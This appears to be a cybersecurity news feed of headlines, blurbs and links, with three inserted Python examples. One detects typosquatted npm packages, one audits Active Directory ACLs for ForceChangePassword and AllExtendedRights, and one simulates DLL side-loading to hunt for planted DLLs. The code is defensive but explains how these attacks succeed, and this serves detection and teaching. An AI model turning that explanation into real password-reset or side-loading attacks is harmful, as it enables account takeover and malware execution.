https://www.hackerone.com/ai/sans-red-blue-team-ops

Malicious QR codes sent in the mail deliver malware
A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.
https://www.malwarebytes.com/blog/news/2024/11/malicious-qr-codes-sent-in-the-mail-deliver-malware

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations
Rapid7's InsightIDR, the foundation of our Managed Detection and Response (MDR) service, empowers security teams with advanced analytics, automation, and expert-led investigations.
https://blog.rapid7.com/2024/11/15/new-idr-log-search-enhancements-accelerate-streamline-and-simplify-investigations/

Cybersecurity dominates concerns among the C-suite, small businesses and the nation
Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data […] The post Cybersecurity dominates concerns among the C-suite, small businesses and the nation appeared first on Security Intelligence.
https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/

CEOs need to act today to outsmart adversaries with AI
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Story in Crain's Detroit Business. Sausalito, Calif. – Nov. 15, 2024. Cyber adversaries (the bad guys) are leveraging AI to infiltrate IT environments and compromise data on an unprecedented scale… The post CEOs need to act today to outsmart adversaries with AI appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ceos-need-to-act-today-to-outsmart-adversaries-with-ai/

Guarding the Games: Cybersecurity and the 2024 Summer Olympics
As Paris prepares to host the 2024 Summer Olympic Games, athletes from around the world converge to represent their country. But beyond the cheers and medals lies a digital underworld.... The post Guarding the Games: Cybersecurity and the 2024 Summer Olympics appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/guarding-the-games-cybersecurity-and-the-2024-summer-olympics/

Zero-Day Exploitation Targeting Palo Alto Networks Firewall Management Interfaces
Palo Alto Networks has indicated they are observing threat activity exploiting a zero-day unauthenticated remote command execution vulnerability in their firewall management interfaces.
https://blog.rapid7.com/2024/11/15/etr-zero-day-exploitation-targeting-palo-alto-networks-firewall-management-interfaces/

Halliburton Cyberattack Update: Losses Worth Million Hit The Firm
Months after the cybersecurity incident, the oil giant Halliburton shared details about the financial losses.… Halliburton Cyberattack Update: Losses Worth Million Hit The Firm on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/halliburton-cyberattack-update-losses-worth-35-million-hit-the-firm/

The Role of Proxies in Modern Cybersecurity & Protecting Data
In an increasingly digital world, data is everything. From sensitive business information to customer records,… The Role of Proxies in Modern Cybersecurity & Protecting Data on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/the-role-of-proxies-in-modern-cybersecurity-protecting-data/

The Importance of Data Security Posture Management (DSPM) in Today's Digital Landscape
DSPM: Much More than Data Traffic Control For today’s CISOs, DPOs, and other data security… The Importance of Data Security Posture Management (DSPM) in Today's Digital Landscape on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/the-importance-of-data-security-posture-management-dspm-in-todays-digital-landscape/

Microsoft Released November 2024 Patch Tuesday With ~90 Fixes
This week marked the arrival of the monthly scheduled updates from Microsoft. With November 2024… Microsoft Released November 2024 Patch Tuesday With ~90 Fixes on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/microsoft-released-november-2024-patch-tuesday-with-90-fixes/

A decade of Cyber Essentials: the journey towards a safer digital future
The 10-year anniversary of Cyber Essentials is not just a celebration of past achievements but a call to action for the future.
https://www.ncsc.gov.uk/blog-post/cyber-essentials-decade

An Interview With the Target & Home Depot Hacker
In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and seeking publicity for several new money making schemes.
https://krebsonsecurity.com/2024/11/an-interview-with-the-target-home-depot-hacker/

CSA Community Spotlight: Addressing Emerging Security Challenges with CISO Pete Chronis
As the Cloud Security Alliance (CSA) celebrates its 15th anniversary, we reflect on the pivotal role CSA volunteers and contributors have played in shaping the future of cloud security. Founded in 2009, CSA quickly established itself as an instrumental leader in the cloud security space, dedicated to defining and promoting best practices for securing the cloud. These best practices are realized in our cloud security-specific research publications, training programs, professional certificates,...
https://cloudsecurityalliance.org/articles/csa-community-spotlight-addressing-emerging-security-challenges-with-ciso-pete-chronis

Top Threat #5 - Third Party Tango: Dancing Around Insecure Resources
Written by CSA's Top Threats Working Group. In this blog series, we cover the key security challenges from CSA's Top Threats to Cloud Computing 2024. Drawing from insights of over 500 experts, we'll discuss the 11 top cybersecurity threats, their business impact, and how to tackle them. Whether you're a professional or a beginner, this series offers a clear guide to the evolving cloud security landscape. Today's post covers the #5 top threat: Insecure Third-Party Resources. What is Cybersecurity...
https://cloudsecurityalliance.org/articles/top-threat-5-third-party-tango-dancing-around-insecure-resources

Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack
North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities. The post Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/

122 million people’s business contact info leaked by data broker
A data broker has confirmed a business contact information database containing 132.8 million records has been leaked online.
https://www.malwarebytes.com/blog/news/2024/11/122-million-peoples-business-contact-info-leaked-by-data-broker

Why that Google Meet error might be a sneaky hacker trick

https://www.proofpoint.com/us/newsroom/news/why-google-meet-error-might-be-sneaky-hacker-trick

Containerizing WordPress: Best Practices for Robust Security and Management
Keeping WordPress secure can be challenging, especially given the Linux security concerns of the typical LAMP stack (Linux, Apache, MySQL, PHP) used to build and deploy it. Most WordPress security issues stem from third-party plugins, insecure coding, and server-level vulnerabilities in that stack.
https://linuxsecurity.com/features/features/containerizing-wordpress-security-best-practices

Why Application-Specific Passwords are a Security Risk in Google Workspace
Originally published by Valence. Written by Jason Silberman. The digital world is constantly changing, and with it, the methods used to secure sensitive information. Decisions made years ago continue to shape today's landscape. The inception of Gmail by Google marked a pivotal moment in history, setting the foundation for the Google Account as we know it today. Unfortunately, the platform's early choices still cast a shadow on today's security posture for everyone who uses it. This blog post wi...
https://cloudsecurityalliance.org/articles/why-application-specific-passwords-are-a-security-risk-in-google-workspace

Managing AI Risk: Three Essential Frameworks to Secure Your AI Systems
Originally published by BARR Advisory. Artificial intelligence (AI) is transforming the way businesses operate across industries, driving advancements in automation, decision-making, and customer experiences. From healthcare to finance, AI has unlocked new opportunities for efficiency and innovation. However, with this rapid evolution comes a new set of challenges. As AI becomes more integrated into business processes, organizations must address the risks posed by these emerging technologies, ...
https://cloudsecurityalliance.org/articles/managing-ai-risk-three-essential-frameworks-to-secure-your-ai-systems

Group-Based Permissions and IGA Shortcomings in the Cloud
Originally published by Britive. Groups make it easier to assign permissions to multiple users at once, reducing the administrative burden and shortening delays on getting appropriate levels of access. Traditional identity governance and administration (IGA) solutions have been pivotal in managing roles and groups across various systems within organizations. However, as organizations expand and modernize their cloud footprint, the limitations of traditional IGA solutions and utilizing groups f...
https://cloudsecurityalliance.org/articles/group-based-permissions-and-iga-shortcomings-in-the-cloud

How AI Changes End-User Experience Optimization and Can Reinvent IT
Originally published by CXO Revolutionaries. Written by Christopher Jablonski, Director, CXO REvolutionaries & Community. Improving the user experience is a top priority as businesses adapt to hybrid work, increased use of SaaS applications, and new business demands. Everyone — employees, partners, and customers — seems to expect the digital world to operate flawlessly. But from an IT perspective, it's a daily struggle. The good news is that solutions are emerging that use AI to identify i...
https://cloudsecurityalliance.org/articles/how-ai-changes-end-user-experience-optimization-and-can-reinvent-it

From risks to resilience: Best practices for software supply chain security
As software supply chains evolve in complexity, managing security risks has become an ever-changing challenge. New threats emerge daily, driven by rapid innovation and the heavy reliance on open source components.
https://www.sonatype.com/blog/from-risks-to-resilience-best-practices-for-software-supply-chain-security

Fortifying the Future: AI Security Is The Cornerstone Of The AI And GenAI Ecosystem
The rapid proliferation of AI technologies is bringing about significant advancements, but it has also introduced a wide range of security challenges. Large language models (LLMs) and computer vision models,... The post Fortifying the Future: AI Security Is The Cornerstone Of The AI And GenAI Ecosystem appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/fortifying-the-future-ai-security-is-the-cornerstone-of-the-ai-and-genai-ecosystem/

ISO/IEC 27001 Certification: Process and Costs
To safeguard your company's data against hackers, scammers, and other web criminals, you need an effective system. And one of the most foolproof ways is achieving ISO/IEC 27001 certification.
https://www.legitsecurity.com/blog/iso-27001-certification

What Is a Software Supply Chain?
Imagine building a house brick by brick only to find out some bricks were faulty. One weak point puts the entire structure at risk, and it takes time and effort to redo what went wrong.
https://www.legitsecurity.com/blog/what-is-software-supply-chain

Android Malware & Security Issue 2nd Week of November, 2024
ASEC Blog publishes "Android Malware & Security Issue 2nd Week of November, 2024". The post Android Malware & Security Issue 2nd Week of November, 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84521/

Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future
As the digital world evolves, businesses increasingly rely on cloud solutions to store data, run operations and manage applications. However, with this growth comes the challenge of ensuring that cloud environments remain secure and compliant with ever-changing regulations. This is where the idea of autonomous security for cloud (ASC) comes into play. Security and compliance […] The post Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future appeared first on Security Intelligence.
https://securityintelligence.com/posts/autonomous-security-for-cloud-in-aws/

Cybersecurity in Crisis: How to Combat the $10.5 Trillion Cybercrime Surge
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Story in The CTO Club. Sausalito, Calif. – Nov. 14, 2024. With global cybercrime costs projected to reach $10.5 trillion annually by 2025, according to Cybersecurity Ventures, organizations across industries are feeling the The post Cybersecurity in Crisis: How to Combat the $10.5 Trillion Cybercrime Surge appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-in-crisis-how-to-combat-the-10-5-trillion-cybercrime-surge/

Advertisers are pushing ad and pop-up blockers using old tricks
A malvertising campaign using an old school trick was found pushing to different ad blockers.
https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-and-pop-up-blockers-using-old-tricks

Scammer robs homebuyers of life savings in $20 million theft spree
A scammer was caught after defrauding some 400 people of almost $20 million in real estate.
https://www.malwarebytes.com/blog/news/2024/11/scammer-robs-homebuyers-of-life-savings-in-20-million-theft-spree

Fake IP checker utilities on npm are crypto stealers
Recently identified npm packages called "node-request-ip", "request-ip-check" and "request-ip-validator" impersonate handy open source utilities relied upon by developers to retrieve an external IP address but instead target Windows, Linux and macOS users with malicious executables which are trojans and cryptocurrency stealers.
https://www.sonatype.com/blog/fake-ip-checker-utilities-on-npm-are-crypto-stealers
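The three package names above follow a recognisable pattern: a real utility name ("request-ip") with a prefix or suffix bolted on. A pre-install check for that pattern, added here as an example and not code from Sonatype or from the packages named in the post. The allowlist of known-good names, the sample package.json, the affix list and the edit-distance threshold are all constructed assumptions a team would tune to its own dependency tree.

```python
"""Flag npm dependency names that impersonate well-known packages.

Added example (not Sonatype's tooling). The allowlist, the package.json and
the affix patterns below are constructed for the demo.
"""
import json
import re
from typing import Dict, Iterable

# Affixes squatters bolt onto a real name; "node-request-ip" and
# "request-ip-check" both collapse to "request-ip" once these are stripped.
AFFIX_RE = re.compile(r"^(?:node|npm|js)-|-(?:check|checker|validator|util|utils|helper|lib|js)$")

# Constructed allowlist: packages this project is known to depend on.
KNOWN_GOOD = {"request-ip", "express", "lodash", "left-pad"}


def strip_affixes(name: str) -> str:
    """Remove decorative prefixes/suffixes until the name stops changing."""
    previous = None
    while previous != name:
        previous, name = name, AFFIX_RE.sub("", name)
    return name


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; a small distance to a popular name is suspicious."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1,                 # deletion
                               current[j - 1] + 1,              # insertion
                               previous[j - 1] + (ca != cb)))   # substitution
        previous = current
    return previous[-1]


def lookalike_reason(name: str, known_good: Iterable[str], max_distance: int = 2) -> str:
    """Explain why a name looks like an impersonation, or return '' if it does not."""
    known = set(known_good)
    if name in known:
        return ""
    base = strip_affixes(name)
    if base in known:
        return f"affixed variant of '{base}'"
    for good in known:
        distance = levenshtein(name, good)
        if 0 < distance <= max_distance:
            return f"{distance} edit(s) away from '{good}'"
    return ""


def audit_package_json(text: str, known_good: Iterable[str] = KNOWN_GOOD) -> Dict[str, str]:
    """Return {dependency: reason} for every suspicious name in a package.json."""
    manifest = json.loads(text)
    findings = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            reason = lookalike_reason(name, known_good)
            if reason:
                findings[name] = reason
    return findings


# Constructed manifest: three names modelled on the post, one typo, two real ones.
SAMPLE_PACKAGE_JSON = json.dumps({
    "dependencies": {
        "express": "^4.19.2",
        "node-request-ip": "1.0.0",
        "request-ip-check": "1.0.0",
        "request-ip-validator": "1.0.0",
        "lodahs": "4.17.21",
    },
    "devDependencies": {"left-pad": "1.3.0"},
})

if __name__ == "__main__":
    for dep, why in audit_package_json(SAMPLE_PACKAGE_JSON).items():
        print(f"{dep}: {why}")
```

Run it against a real package.json before `npm install` executes any lifecycle scripts; a hit is a prompt to look at the package's publisher, age and contents, not proof of malice, since legitimate forks also use these affixes.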

Crimeware and financial cyberthreats in 2025
Kaspersky's GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025.
https://securelist.com/ksb-financial-and-crimeware-predictions-2025/114565/

Abusing AD-DACL: AllExtendedRights
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AllExtendedRights permission in Active Directory environments. With this permission, The post Abusing AD-DACL: AllExtendedRights appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-allextendedrights/

Abusing AD-DACL: ForceChangePassword
In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the ForceChangePassword permission in Active Directory environments. This permission is especially The post Abusing AD-DACL: ForceChangePassword appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-forcechangepassword/
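Both of the Hacking Articles posts above (AllExtendedRights and ForceChangePassword) turn on the same ACE shape: an allow ACE carrying the control-access right (SDDL "CR"), either with no object GUID (every extended right) or with the User-Force-Change-Password GUID. The following is an added example, not code from those posts, that audits an object's DACL for exactly those ACEs from its SDDL string (the form `Get-Acl`/`dsacls` print, or that `ntSecurityDescriptor` converts to). The SDDL and the domain SID in it are constructed; the deny-overrides-allow handling is a simplification of the real access check.

```python
"""Who can abuse AllExtendedRights / ForceChangePassword on an AD object?

Added example, not code from the Hacking Articles posts. It parses the SDDL
form of an object's security descriptor and reports each trustee holding the
extended-rights access the two posts describe. SAMPLE_SDDL is constructed and
its domain SID is made up.
"""
import re
from typing import Dict, Optional, Set, Tuple

# Schema GUID of the User-Force-Change-Password extended right.
FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100   # SDDL "CR": the bit that gates extended rights
GENERIC_ALL = 0x10000000              # SDDL "GA": implies every right, CR included

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))+)")  # DACL flags, then its ACE list
ACE_RE = re.compile(r"\(([^()]*)\)")


def rights_include_control_access(rights: str) -> bool:
    """True if an SDDL rights field carries CR or GA, in hex or two-letter form."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (ADS_RIGHT_DS_CONTROL_ACCESS | GENERIC_ALL))
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & {"CR", "GA"})


def classify_ace(ace: str) -> Optional[Tuple[bool, str, str]]:
    """Map one ACE to (is_allow, trustee, label), or None when it is not of interest.

    CR with an empty object GUID means the trustee holds *all* extended rights;
    CR with the ForceChangePassword GUID means just that one right.
    """
    fields = ace.split(";")
    if len(fields) < 6:
        return None
    ace_type, _flags, rights, object_guid, _inherit_guid, trustee = fields[:6]
    if ace_type not in {"A", "OA", "D", "OD"}:     # skip audit/alarm ACEs
        return None
    if not rights_include_control_access(rights):
        return None
    object_guid = object_guid.lower()
    if object_guid == "":
        label = "AllExtendedRights"
    elif object_guid == FORCE_CHANGE_PASSWORD_GUID:
        label = "ForceChangePassword"
    else:
        return None   # some other single extended right; out of scope here
    return ace_type in {"A", "OA"}, trustee, label


def audit_extended_rights(sddl: str) -> Dict[str, Set[str]]:
    """Return {trustee: {labels}} for allow ACEs not cancelled by a matching deny."""
    match = DACL_RE.search(sddl)
    if not match:
        return {}
    allowed: Dict[str, Set[str]] = {}
    denied: Set[Tuple[str, str]] = set()
    for ace in ACE_RE.findall(match.group(1)):
        classified = classify_ace(ace)
        if classified is None:
            continue
        is_allow, trustee, label = classified
        if is_allow:
            allowed.setdefault(trustee, set()).add(label)
        else:
            denied.add((trustee, label))
    for trustee, label in denied:          # explicit deny wins over allow
        allowed.get(trustee, set()).discard(label)
    return {t: labels for t, labels in allowed.items() if labels}


# Constructed SDDL for a user object; domain SID S-1-5-21-1004336348-1177238915-682003330 is made up.
SAMPLE_SDDL = (
    "O:DAG:DAD:"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"   # Domain Admins: full control, CR with no GUID
    "(A;;RPLCLORC;;;AU)"                     # Authenticated Users: read-only, no CR
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1105)"  # ForceChangePassword only
    "(A;;CR;;;S-1-5-21-1004336348-1177238915-682003330-1106)"                                       # CR, no GUID: AllExtendedRights
    "(A;;0x100;;;S-1-5-21-1004336348-1177238915-682003330-1108)"                                    # same right in hex-mask form
    "(OD;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1107)"  # explicit deny ...
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1107)"  # ... cancels this allow
)

if __name__ == "__main__":
    for trustee, labels in audit_extended_rights(SAMPLE_SDDL).items():
        print(f"{trustee}: {', '.join(sorted(labels))}")
```

Anything reported for a non-admin SID is a finding: a holder of ForceChangePassword can reset the target's password without knowing the old one, and a holder of AllExtendedRights gets that plus every other control-access right on the object. Resolve the SIDs to accounts and check group nesting before deciding the ACE is intentional.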

HackerOne's Fall Day of Service

https://www.hackerone.com/culture-and-talent/hackerones-fall-day-service

How HackerOne Disproved an MFA Bypass With a Spot Check
Read how HackerOne's internal security team disproved an alleged MFA bypass with a targeted Spot Check.
https://www.hackerone.com/vulnerability-management/spot-check-mfa-bypass

Biometrics in the Cyber World
by Victoria Hargrove, Reporter, CDM. In today's society, digital threats occur at a consistent and concerning rate. Traditional authentication methods no longer stand a chance of preventing these threats.... The post Biometrics in the Cyber World appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/biometrics-in-the-cyber-world/

Sonatype recognized as a leader in SCA software in Forrester Wave
We are thrilled to announce that The Forrester Wave™: Software Composition Analysis Software, Q4 2024 recently named Sonatype a leader in software composition analysis (SCA) software. Sonatype received the highest scores in the current offering and strategy categories among evaluated SCA software vendors.
https://www.sonatype.com/blog/sonatype-recognized-as-a-leader-in-sca-software-in-forrester-wave

Safer with Google: New intelligent, real-time protections on Android to keep you safe
Posted by Lyubov Farafonova, Product Manager and Steve Kafka, Group Product Manager, Android User safety is at the heart of everything we do at Google. Our mission to make technology helpful for everyone means building features that protect you while keeping your privacy top of mind. From Gmail's defenses that stop more than 99.9% of spam, phishing and malware, to Google Messages' advanced security that protects users from 2 billion suspicious messages a month and beyond, we're constantly developing and expanding protection features that help keep you safe. We're introducing two new real-time protection features that enhance your safety, all while safeguarding your privacy: Scam Detection in Phone by Google to protect you from scams and fraud, and Google Play Protect live threat detection...
http://security.googleblog.com/2024/11/new-real-time-protections-on-Android.html

Microsoft Data Security Index annual report highlights evolving generative AI security needs
84% of surveyed organizations want to feel more confident about managing and discovering data input into AI apps and tools. The post Microsoft Data Security Index annual report highlights evolving generative AI security needs appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/13/microsoft-data-security-index-annual-report-highlights-evolving-generative-ai-security-needs/

Cloud Security Alliance Issues Comprehensive Guidelines for Auditing Artificial Intelligence (AI) Systems, Beyond Compliance
Paper presents a holistic overview and applicable methodology for impartially assessing intelligent systems. SEATTLE – Nov. 14, 2024 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, today released Artificial Intelligence (AI) Risk Management: Thinking Beyond Regulatory Boundaries. Drafted by CSA's AI Governance & Compliance Working Group, the document...
https://cloudsecurityalliance.org/articles/csa-issues-comprehensive-guidelines-for-auditing-ai-systems-beyond-compliance

5 Essential Features of an Effective Malware Sandbox
Malware sandboxes offer a safe and controlled environment to analyze potentially harmful software and URLs. However, not all sandboxes incorporate features that are essential for proper analysis. Let’s look at... The post 5 Essential Features of an Effective Malware Sandbox appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/5-essential-features-of-an-effective-malware-sandbox/

Threat Trend Report on Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums and Markets of October 2024
Note: This trend report on the deep web and dark web of October 2024 is sectioned into Ransomware, Forums & Black Markets, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true. Major Issues: 1. Ransomware; 1.1. […] The post Threat Trend Report on Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums and Markets of October 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84530/

Report on DDoSia Malware Launching DDoS Attacks Against Korean Institutions
The Russian hacktivist group NoName057(16) has been active since March 2022; its goal is to launch DDoS attacks against targets with anti-Russian views. In November 2024, NoName057(16), along with the pro-Russian hacktivist groups Cyber Army of Russia Reborn and Alixsec, launched DDoS attacks against the websites of major South Korean government agencies. The […] The post Report on DDoSia Malware Launching DDoS Attacks Against Korean Institutions appeared first on ASEC.
https://asec.ahnlab.com/en/84531/

XLoader Executed Through JAR Signing Tool (jarsigner.exe)
Recently, AhnLab Security Intelligence Center (ASEC) identified the distribution of XLoader malware using the DLL side-loading technique. In DLL side-loading, a legitimate application and a malicious DLL are placed in the same folder so that the malicious DLL is loaded, and therefore executed, when the application is run. The legitimate application used in the […] The post XLoader Executed Through JAR Signing Tool (jarsigner.exe) appeared first on ASEC.
https://asec.ahnlab.com/en/84574/
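Side-loading works because the Windows loader, when a DLL is requested by bare name, searches the application's own directory before the system directory, so a DLL planted beside a copied legitimate EXE wins. The following is an added example that is not ASEC's code and does not reproduce the XLoader sample: it emulates the default (SafeDllSearchMode) search order over a constructed directory tree and includes a small hunting heuristic for DLLs beside an EXE that shadow a system DLL of the same name. The file names (`legit.exe`, `sample.dll`), the directory layout and the KnownDLLs subset are constructed assumptions.

```python
"""How DLL side-loading works: the loader looks in the application's own
directory before the system directory, so a DLL planted next to a copied
legitimate EXE wins. Added example (not ASEC's code); the directory tree,
file contents and DLL names are constructed here and are not taken from the
XLoader sample. Paths mimic Windows but the demo runs on any OS.
"""
import tempfile
from pathlib import Path
from typing import Dict, FrozenSet, List, Optional


def resolve_dll(dll_name: str, app_dir: Path, system_dir: Path, windows_dir: Path,
                cwd: Path, path_dirs: List[Path],
                known_dlls: FrozenSet[str] = frozenset()) -> Optional[Path]:
    """Emulate the default (SafeDllSearchMode) search order for a DLL loaded by name.

    KnownDLLs (kernel32.dll, ntdll.dll, ...) are mapped from the system directory
    regardless of where the EXE lives, which is why side-loading targets DLLs
    that are NOT on that list.
    """
    if dll_name.lower() in known_dlls:
        candidate = system_dir / dll_name
        return candidate if candidate.is_file() else None
    # The 16-bit system directory step is omitted; it never matters on 64-bit hosts.
    for directory in [app_dir, system_dir, windows_dir, cwd, *path_dirs]:
        candidate = directory / dll_name
        if candidate.is_file():
            return candidate          # first hit wins
    return None


def sideload_candidates(app_dir: Path, system_dir: Path,
                        known_dlls: FrozenSet[str] = frozenset()) -> List[str]:
    """Hunting heuristic: DLLs beside the EXE that shadow a system DLL of the same name."""
    system_names = {p.name.lower() for p in system_dir.glob("*.dll")}
    return sorted(p.name for p in app_dir.glob("*.dll")
                  if p.name.lower() in system_names and p.name.lower() not in known_dlls)


def build_demo_tree(root: Path) -> Dict[str, Path]:
    """Constructed layout: a legit EXE copied to a user-writable folder with a planted DLL."""
    app = root / "Users" / "Public" / "tool"
    windows = root / "Windows"
    system32 = windows / "System32"
    for d in (app, system32):
        d.mkdir(parents=True)
    (app / "legit.exe").write_bytes(b"MZ")                 # stand-in for the signed binary
    (system32 / "sample.dll").write_bytes(b"MZ real")      # the DLL the EXE really imports
    (app / "sample.dll").write_bytes(b"MZ planted")        # attacker's DLL, same name
    (system32 / "kernel32.dll").write_bytes(b"MZ real")
    (app / "kernel32.dll").write_bytes(b"MZ planted")      # planting a KnownDLL does nothing
    return {"app": app, "system32": system32, "windows": windows}


def demo() -> Dict[str, str]:
    """Resolve both DLLs against the constructed tree and list side-load candidates."""
    with tempfile.TemporaryDirectory() as tmp:
        t = build_demo_tree(Path(tmp))
        known = frozenset({"kernel32.dll", "ntdll.dll"})   # constructed subset of KnownDLLs
        common = (t["app"], t["system32"], t["windows"], t["app"], [])
        planted = resolve_dll("sample.dll", *common, known)
        k32 = resolve_dll("kernel32.dll", *common, known)
        return {
            "sample.dll": planted.read_bytes().decode(),
            "kernel32.dll": k32.read_bytes().decode(),
            "candidates": ",".join(sideload_candidates(t["app"], t["system32"], known)),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The heuristic on its own is noisy, since many legitimate installers ship DLLs that share names with system DLLs; pair it with two checks the post's case suggests: whether the EXE sits outside its vendor's normal install path (a JDK tool in a user-writable folder) and whether the co-located DLL is unsigned or signed by a different publisher than the EXE.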

Ransom & Dark Web Issues Week 2, November 2024
ASEC Blog publishes Ransom & Dark Web Issues Week 2, November 2024: Massive Data Breach Exploiting MOVEit Security Vulnerability: Employee Information from Amazon, McDonald's, HSBC, and More Leaked; South Korean Energy Company: Data Breach Due to RA World Ransomware Attack; New Ransomware Gang Kairos: Six New Victim Companies Revealed, Including Taiwanese […] The post Ransom & Dark Web Issues Week 2, November 2024 appeared first on ASEC.
https://asec.ahnlab.com/en/84434/

Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurity
Nation-state adversaries are changing their approach, pivoting from data destruction to prioritizing stealth and espionage. According to the Microsoft 2023 Digital Defense Report, “nation-state attackers are increasing their investments and launching more sophisticated cyberattacks to evade detection and achieve strategic priorities.” These actors pose a critical threat to United States infrastructure and protected data, and […] The post Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurity appeared first on Security Intelligence.
https://securityintelligence.com/articles/adversarial-advantage-using-nation-state-threat-analysis-to-strengthen-us-cybersecurity/

Microsoft 365: Guide To Backup And Recovery. What's At Risk.
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in Cloud Computing Magazine Sausalito, Calif. – Nov. 13, 2024 Microsoft 365 has become the backbone of critical operations for businesses of all sizes in various industries. According to estimates, approximately 345 The post Microsoft 365: Guide To Backup And Recovery. What’s At Risk. appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/microsoft-365-guide-to-backup-and-recovery-whats-at-risk/

Helping banish malicious adverts – and drive a secure advertising ecosystem
If your brand uses digital advertising, the NCSC has new guidance to help you choose a security-minded partner.
https://www.ncsc.gov.uk/blog-post/helping-banish-malicious-adverts

Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-ecosystem

1-15 August 2024 Cyber Attacks Timeline
In the first timeline of August 2024 I collected 123 events (8.13 events/day) with a threat landscape that was one of those exceptions...
https://www.hackmageddon.com/2024/11/13/1-15-august-2024-cyber-attacks-timeline/

Global Companies Are Unknowingly Paying North Koreans: Here's How to Catch Them
We discuss North Korea's use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this. The post Global Companies Are Unknowingly Paying North Koreans: Here's How to Catch Them appeared first on Unit 42.
https://unit42.paloaltonetworks.com/north-korean-it-workers/

Threats in space (or rather, on Earth): internet-exposed GNSS receivers
Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks.
https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/

DemandScience by Pure Incubation - 121,796,165 breached accounts
In early 2024, a large corpus of data from DemandScience (a company owned by Pure Incubation), appeared for sale on a popular hacking forum. Later attributed to a leak from a decommissioned legacy system, the breach contained extensive data that was largely business contact information aggregated from public sources. Specifically, the data included 122M unique corporate email addresses, physical addresses, phone numbers, employers and job titles. It also included names and for many individuals, a link to their LinkedIn profile.
https://haveibeenpwned.com/PwnedWebsites#DemandScience

Patch Tuesday - November 2024
4 zero-days. AD CS ESC15 aka EKUwu. NTLMv2 disclosure. Exchange sender spoofing. Task scheduler EoP. .NET & Kerberos critical RCEs. Welcome Server 2025.
